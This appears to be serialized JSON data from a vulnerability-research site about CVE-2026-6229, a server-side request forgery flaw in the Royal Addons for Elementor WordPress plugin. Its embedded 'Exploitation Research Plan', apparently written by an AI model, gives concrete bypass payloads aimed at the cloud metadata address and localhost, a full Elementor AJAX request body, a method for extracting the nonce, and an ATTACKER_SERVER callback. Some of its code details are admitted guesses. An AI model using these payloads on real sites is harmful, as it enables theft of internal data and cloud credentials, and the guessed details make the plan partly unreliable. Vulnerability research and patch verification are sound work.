[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fs_HKm-dPh_l3Yzay01jf8dvPZiBa-OjsahBnSsIpqEA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":33},"CVE-2026-6229","royal-addons-for-elementor-authenticated-contributor-server-side-request-forgery-via-csv-url-parameter","Royal Addons for Elementor \u003C= 1.7.1057 - Authenticated (Contributor+) Server-Side Request Forgery via CSV URL Parameter","The Royal Elementor Addons plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 1.7.1057. This is due to insufficient validation of user-supplied URLs in the render_csv_data() function, which can be bypassed by including 'docs.google.com\u002Fspreadsheets' in a query parameter, and the subsequent use of these URLs in fopen() calls without blocking internal or private network addresses. This makes it possible for authenticated attackers, with Contributor-level access and above, to make requests to arbitrary URLs and retrieve sensitive information from internal services.","royal-elementor-addons",null,"\u003C=1.7.1057","1.7.1058","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Server-Side Request Forgery (SSRF)","2026-05-01 00:00:00","2026-05-02 07:46:42",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F9744055a-b199-4945-afcc-4f5b85f5f1e8?source=api-prod",1,[22,23,24,25],"admin\u002Ftemplates\u002Flibrary\u002Fwpr-templates-data.php","modules\u002Fdata-table\u002Fwidgets\u002Fwpr-data-table.php","readme.txt","wpr-addons.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-6229\n\n## 1. Vulnerability Summary\nThe **Royal Addons for Elementor** plugin (versions \u003C= 1.7.1057) contains a Server-Side Request Forgery (SSRF) vulnerability in its **Data Table** widget. The vulnerability exists in the `render_csv_data()` function (located in `modules\u002Fdata-table\u002Fwidgets\u002Fwpr-data-table.php`). \n\nThe plugin attempts to validate that a user-provided CSV URL is hosted on Google Sheets by checking for the string `docs.google.com\u002Fspreadsheets`. However, this check is insufficient as it can be bypassed by appending the string as a query parameter to an arbitrary URL. The plugin then passes this URL to `fopen()`, allowing an authenticated attacker (Contributor+) to make requests to internal network resources and potentially retrieve sensitive data.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `POST \u002Fwp-admin\u002Fadmin-ajax.php` (via Elementor's `render_widget` or `editor_save` actions) or via the frontend by viewing a post containing the widget.\n- **Vulnerable Action**: `elementor_ajax` (standard Elementor AJAX handler).\n- **Vulnerable Parameter**: `settings[csv_url]` (or similar setting name for the CSV data source in the `wpr-data-table` widget).\n- **Authentication**: Authenticated (Contributor level or higher) is required to edit posts and add widgets.\n- **Preconditions**: The \"Data Table\" widget must be added to an Elementor-enabled post\u002Fpage, and the \"Data Type\" (`choose_table_type`) must be set to the CSV option (internal ID `pro-cv`).\n\n## 3. Code Flow\n1. **Entry Point**: A user with Contributor+ permissions edits an Elementor page or sends a direct AJAX request to render a widget.\n2. **Widget Execution**: The `Wpr_Data_Table` class (in `modules\u002Fdata-table\u002Fwidgets\u002Fwpr-data-table.php`) is instantiated.\n3. **Render Logic**: The `render()` method is called. If the `choose_table_type` setting is set to `pro-cv`, it invokes `render_csv_data()`.\n4. **Vulnerable Function**: `render_csv_data($settings)` (inferred function name from description).\n5. **Insufficient Validation**: \n   ```php\n   \u002F\u002F Conceptual logic based on vulnerability description\n   $url = $settings['csv_url']; \n   if ( strpos( $url, 'docs.google.com\u002Fspreadsheets' ) !== false ) {\n       $handle = fopen( $url, 'r' ); \u002F\u002F SSRF Sink\n       \u002F\u002F ... processing CSV data\n   }\n   ```\n6. **SSRF Sink**: `fopen($url, 'r')` is called with the attacker-controlled URL. Since internal IPs are not blocked, the request is made by the server.\n\n## 4. Nonce Acquisition Strategy\nElementor uses its own AJAX infrastructure. To interact with the Elementor editor API as a Contributor:\n1. **Create Page**: Use WP-CLI to create a page with Elementor enabled or simply a page where we can edit.\n   ```bash\n   wp post create --post_type=page --post_title=\"SSRF Lab\" --post_status=publish --post_author=CONTRIBUTOR_ID\n   ```\n2. **Access Editor**: Navigate to the Elementor editor URL for that page: `\u002Fwp-admin\u002Fpost.php?post=POST_ID&action=elementor`.\n3. **Extract Nonce**: Elementor stores its AJAX nonce in the `elementorCommon` or `elementorConfig` object.\n   - Use `browser_eval`: `window.elementorConfig?.ajax?.nonce` or `window.elementorCommon?.config?.ajax?.nonce`.\n4. **Alternative**: If exploiting via the `render_widget` action, the nonce is often found in the page source of the editor.\n\n## 5. Exploitation Strategy\n\n### Step 1: Craft the SSRF Payload\nTo bypass the domain check, append the required string as a parameter:\n- **Target**: Internal Metadata Service (e.g., `http:\u002F\u002F169.254.169.254\u002Flatest\u002Fmeta-data\u002F`)\n- **Payload**: `http:\u002F\u002F169.254.169.254\u002Flatest\u002Fmeta-data\u002F?x=docs.google.com\u002Fspreadsheets`\n- **Target (Local)**: `http:\u002F\u002F127.0.0.1:80\u002Fwp-admin\u002F`\n- **Payload**: `http:\u002F\u002F127.0.0.1:80\u002Fwp-admin\u002F?docs.google.com\u002Fspreadsheets`\n\n### Step 2: Trigger SSRF via Elementor AJAX\nWe will use the `elementor_ajax` action to force the server to render the widget with our malicious settings.\n\n**Request**:\n- **URL**: `http:\u002F\u002FTARGET\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: `POST`\n- **Content-Type**: `application\u002Fx-www-form-urlencoded`\n- **Body**:\n  ```text\n  action=elementor_ajax&\n  actions={\"render_widget\":{\"action\":\"render_widget\",\"data\":{\"editorPostId\":POST_ID,\"widgetId\":\"random-id\",\"model\":{\"id\":\"random-id\",\"elType\":\"widget\",\"widgetType\":\"wpr-data-table\",\"settings\":{\"choose_table_type\":\"pro-cv\",\"csv_url\":\"http:\u002F\u002F127.0.0.1:80\u002Fwp-admin\u002F?docs.google.com\u002Fspreadsheets\"}}}}}&\n  _nonce=EXTRACTED_NONCE\n  ```\n\n### Step 3: Capture Response\nThe plugin will attempt to parse the response from `127.0.0.1` as a CSV. If the internal service returns content, it may be reflected in the AJAX response under the `render_widget` data key, likely inside an HTML `\u003Ctable>` structure.\n\n## 6. Test Data Setup\n1. **Plugin Installation**: Ensure `royal-elementor-addons` v1.7.1057 is installed.\n2. **User Creation**: Create a Contributor user.\n   ```bash\n   wp user create attacker attacker@example.com --role=contributor --user_pass=password\n   ```\n3. **Internal Target**: Ensure there is an internal service to hit (e.g., a simple local listener or the default WordPress login page on `127.0.0.1`).\n\n## 7. Expected Results\n- **Success**: The server response contains the HTML\u002Fcontent of the internal URL provided in `csv_url`, attempted to be rendered as table cells. For example, if hitting a local web server, you might see fragments of HTML within `\u003Ctd>` tags in the JSON response.\n- **Verification**: The HTTP logs of the internal service (if accessible) should show a request originating from the WordPress server's IP with the User-Agent associated with PHP's `fopen` (often empty or the server's default).\n\n## 8. Verification Steps\n1. **Monitor Outbound Traffic**: Use a tool like `tcpdump` or a webhook service (e.g., `webhook.site`) if testing external SSRF.\n   - Payload: `http:\u002F\u002FATTACKER_SERVER\u002F?docs.google.com\u002Fspreadsheets`\n2. **Check Table Output**: Use `wp_cli` to check the post content if the widget was saved:\n   ```bash\n   wp post get POST_ID --field=post_content\n   ```\n3. **Error Logs**: Check `wp-content\u002Fdebug.log`. If the internal service doesn't return valid CSV data, `fgetcsv()` might trigger warnings visible in the log.\n\n## 9. Alternative Approaches\n- **Save and View**: Instead of the `render_widget` AJAX action, use the `editor_save_builder` action to save the malicious settings to a post, then view the post on the frontend as an unauthenticated user (if published) to see if the SSRF triggers and renders data.\n- **Protocol Smuggling**: If `fopen` is used, check if other wrappers like `php:\u002F\u002Ffilter` are allowed (though `strpos` usually restricts this unless the attacker finds a clever way to include the Google string).\n- **Pro Bypass**: If the \"Pro\" check is enforced server-side, the attacker may need to find a way to set the `choose_table_type` to `pro-cv` by manipulating the JSON payload sent to the Elementor `save_builder` action, as the server-side code for rendering CSVs is often present in the free version.","gemini-3-flash-preview","2026-05-04 17:32:41","2026-05-04 17:33:11",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","1.7.1057","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1057","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1057.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1058","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1058.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags"]